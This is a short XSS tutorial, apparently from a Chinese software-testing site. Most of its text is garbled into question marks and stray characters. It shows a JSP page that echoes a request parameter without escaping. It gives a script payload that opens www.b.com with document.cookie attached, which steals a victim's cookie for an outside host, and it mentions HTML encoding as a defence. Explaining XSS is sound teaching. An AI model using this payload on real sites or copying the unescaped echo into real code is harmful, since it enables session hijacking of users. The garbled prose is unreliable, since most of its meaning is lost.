XSS??????????
???????????? ???????[ 2013/12/13 10:59:17 ] ????????
????XSS???CSS?????Cross SiteScript????????????????Web?????谐??????????XSS??????????????????????????????????????????危?????????????????????XSS??????????????(????)?????HTML???????????????????????????HTML??????????校?????????????????纾�??????Cookie??????????????????????????
????XSS????
????XSS??????????SQL???????????????????????????????XSS??????????XSS????????????????DOM Based XSS????????????Stored XSS???????????????锌??????????卸???????????写??????????????XSS??????????危??????????????????????????????????????script??
????DOM Based XSS
????DOM Based XSS???????????DOM??????????霉???????????械????????????
???????????
??????????a.com???????????????些?????????url?械??????content??????????????2???????娲�??????????????????????????
|
<%@ page language="java"contentType="text/html; charset=UTF-8"pageEncoding="UTF-8"%>
<!DOCTYPEhtmlPUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>XSS????</title>
</head>
<body>
????????<%=request.getParameter("content")%>
</body>
</html>
|
???????????Tom?????????????????????????????(????????????????????????)?????????????????????????????????http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>????Tom??????????????(????????????a.com)?????????????b.com???????Tom??a.com?械?cookie????????b.com??b.com???????????????????????????????????????Tom??a.com??cookie?????cookie????锌?????械???????????????????????校?????????Tom?????????????????????a.com?content=<script>alert(“xss”)</script>?????????????????????校???????????????????xss????????????????????????????喂????????????????
????Stored XSS
????Stored XSS??娲�?XSS??????????涔�??????????娲�???????????????????校?????????????????
????????????
????a.com????????锟�?????????a.com?蟹??????????锟�??????邪???????????<script>window.open(“www.b.com?param=”+document.cookie)</script>??????????????Tom??Jack????????????????锟�????????????????????????????cookie????????????????????????????????????????校?????????????
????Stored XSS???危???????危???????
????XSS????
???????????????矛????????校???矛?卸?????????????胁????????????????????????????????????蟹?????XSS?????????路????
???????????????
??????????????????????????????????????写?????????????????????????????????
????Html encode
?????????些????锟�??????????????????????????????????????????????????
??????
???路???
??????????????????
2023/3/23 14:23:39???写?貌??????????
2023/3/22 16:17:39????????????????????些??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???路???????路
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11
sales@spasvo.com